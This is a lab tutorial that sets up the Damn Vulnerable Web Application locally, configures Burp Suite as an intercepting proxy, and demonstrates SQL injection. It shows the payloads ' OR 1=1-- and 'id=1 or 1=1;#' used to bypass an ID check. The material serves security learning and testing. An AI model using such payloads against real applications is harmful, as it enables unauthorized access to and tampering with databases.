Vulnerability Assessment with Burp Suite

Objective: Perform a security assessment of a vulnerable web application using Burp Suite. We'll identify and exploit SQL Injection with the use of Burp Suite.

Introduction

One of the most prevalent and dangerous flaws in web applications nowadays is SQL Injection. By taking advantage of this vulnerability, attackers may gain illegal access to a database and be able to retrieve, alter, or even remove data. Web application security requires an understanding of SQL Injection and regular testing for it. This guide offers helpful insights into recognizing and reducing this serious security risk by providing a clear, step-by-step explanation of how to conduct SQL Injection testing using Burp Suite.

Setting Up the Testing Environment

Before diving into SQL Injection testing, it is essential to have the right tools and environment. The process begins by setting up Damn Vulnerable Web Application (DVWA) on an Ubuntu virtual machine. DVWA serves as the target for testing due to its intentionally weak security settings, making it an ideal platform for learning and practice.

Step 1: First of all, update Linux environment.

Step 2: Install Java (if not already installed)

Step 3: Install and configure Burp Suite (if not already installed)

Start by installing Apache, MySQL, and PHP, the foundational components needed to run DVWA. Once these are installed, the DVWA application is downloaded and configured to run locally on the machine. After setting up the MySQL database, the DVWA configuration file is edited to reflect the correct database credentials.

Step 4: Installing Apache, MySQL, and PHP

Step 5: Cloning DVWA from GitHub and placed it in /var/www/html/.

Step 6: Set the correct permissions

Step 7: Setting up the MySQL database

Step 8: Note down the user, password and database with the use of .php file(s)

(.php files can be found within the config folder inside dvwa folder.)

With the setup complete, access DVWA via a web browser by navigating to http://localhost/DVWA/. Logging in with default credentials allows access to various vulnerable modules, including the one dedicated to SQL Injection.

Step 9: Access DVWA (localhost) via a web browser

Configuring Burp Suite

Serving as a bridge between the web browser and the web application, Burp Suite is an effective tool for web application security testing. The proper configuration of Burp Suite is required in order to record and examine HTTP requests and responses.

Begin by launching Burp Suite and setting up the proxy listener on 127.0.0.1:8080. This allows Burp Suite to capture all traffic passing through this port. Next, configure the browser to use this proxy, ensuring all interactions with DVWA are routed through Burp Suite.

Step 10: Setting up the proxy listener on Burp Suite 127.0.0.1:8080

Step 11: Configure the browser to use this above proxy

Installing Burp Suite’s CA certificate in the browser is essential for handling HTTPS traffic. This step avoids SSL warnings and allows Burp Suite to decrypt and inspect secure communications.

Step 12: Installing Burp Suite’s CA certificate into browser's trusted certificate authorities

Exploiting SQL Injection

Once a potential SQL Injection point is identified, it’s time to attempt an exploitation. The goal here is to manipulate the SQL query by injecting malicious code. A common technique is to use a payload like ' OR 1=1--, which alters the logic of the SQL query.

To do this, capture the HTTP request that contains the user input using Burp Suite. Within Burp Suite, modify the input field in the captured request by injecting the SQL payload. Forward the modified request to the server and observe the response.

Step 13: In Burp Suite, go to Proxy > Intercept and make sure "Intercept is on."

Step 14: Enter the payload

Step 15: Modify the input field in the captured request by injecting the required SQL payload

When a SQL Injection attack is successful, it frequently yields unexpected outcomes like showing every record in the database or getting around authentication. Here, the SQL payload allows us to bypass User IDs. "id=1 or 1=1;#&Submit=Submit" is the payload. Since 1=1 is always true, we can skip the ID. This suggests that SQL Injection could be used against the application. That simply means the application is vulnerable.

Conclusion

It is impossible to overestimate the significance of web application security in today's digital environment. If left unchecked, SQL Injection is a frequent yet potent attack that can do significant damage. This project provides practical experience that is vital for anyone serious about web security, highlighting the crucial steps involved in locating and exploiting SQL Injection vulnerabilities.  Important and valuable data can be safeguarded and web applications can be kept safe from threats by knowing how these attacks operate and implementing the appropriate security measures. Gaining proficiency in SQL Injection testing is essential for enhancing web applications' overall security and making the internet a safer place for everyone.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Project by: Chandu Dissanayake

Article by: Chandu Dissanayake